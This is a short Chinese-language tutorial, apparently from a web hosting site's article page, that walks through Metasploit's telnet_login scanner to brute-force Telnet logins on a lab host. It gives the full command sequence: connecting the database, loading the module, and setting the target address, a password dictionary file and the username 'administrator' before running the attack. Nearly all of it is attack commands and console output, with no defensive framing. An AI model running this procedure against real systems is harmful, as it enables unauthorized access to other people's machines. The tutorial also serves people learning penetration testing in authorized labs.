您好,登录后才能下订单哦!
网络拓扑:
1.进入metasploit:root@debian:~# msfconsole
2.进行数据库连接:
msf > db_connect msf_user:111111@127.0.0.1/msf_database
[*] Rebuilding the module cache in the background...
msf > db_status
[*] postgresql connected to msf_database
3.进行搜索下telnet模块msf > search telnet_login
================
Name Disclosure Date Rank Description
auxiliary/scanner/telnet/telnet_login normal Telnet Login Check Scanner
4.使用模块:msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(scanner/telnet/telnet_login) >
5.查看配置选项:msf auxiliary(scanner/telnet/telnet_login) > show options
Module options (auxiliary/scanner/telnet/telnet_login):
6.进行选项配置:auliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.152.129
9```
RHOSTS => 192.168.152.129 目标主机设置
set PASS_FILE /root/pass 选择密码字典表
set USERNAME administrator 设置用户名
exploit 进行爆破
7.查看结果
速度的快慢取决于密码复杂度与字典表大小
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。